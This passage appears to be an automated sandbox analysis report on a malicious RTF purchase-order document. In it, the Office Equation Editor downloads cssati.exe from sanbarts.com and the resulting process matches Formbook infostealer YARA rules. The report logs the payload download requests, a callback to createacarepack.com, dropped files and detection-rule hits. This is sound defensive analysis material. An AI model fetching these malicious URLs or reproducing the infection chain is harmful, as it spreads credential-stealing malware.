          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: EQNEDT32.EXE, 00000002.00000002.915025383.000000000098D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://sanbarts.com/33
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914970619.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://sanbarts.com/cssati.exe
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://sanbarts.com/cssati.exej
          Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.967364013.0000000006450000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.971345322.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 00000007.00000000.958260640.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.958544011.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.963238551.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.939397773.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 00000007.00000000.1025977451.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.953687008.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.965173113.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.941729011.0000000004385000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.piriform.com/ccleanerv
          Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.sanbarts.com/Couri
          Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.sanbarts.com/YR$
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/cssati.exe
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/cssati.exeC:
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/cssati.exekkC:
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: wuapp.exe, 00000008.00000002.1182990879.000000000293F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6C29C56C-3D5B-4878-9A01-77B8177CDD57}.tmp
          Source: unknownDNS traffic detected: queries for: sanbarts.com
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sanbarts.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.sanbarts.com
          Source: global trafficHTTP traffic detected: GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1Host: www.createacarepack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: initial sampleStatic file information: Filename: Revised RFQ-PO180911.doc
          Source: Revised RFQ-PO180911.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe
          Source: Revised RFQ-PO180911.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004047EE
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00406083
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C0276
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C1A6F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C4CC4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009BAC14
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C2D97
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C0D53
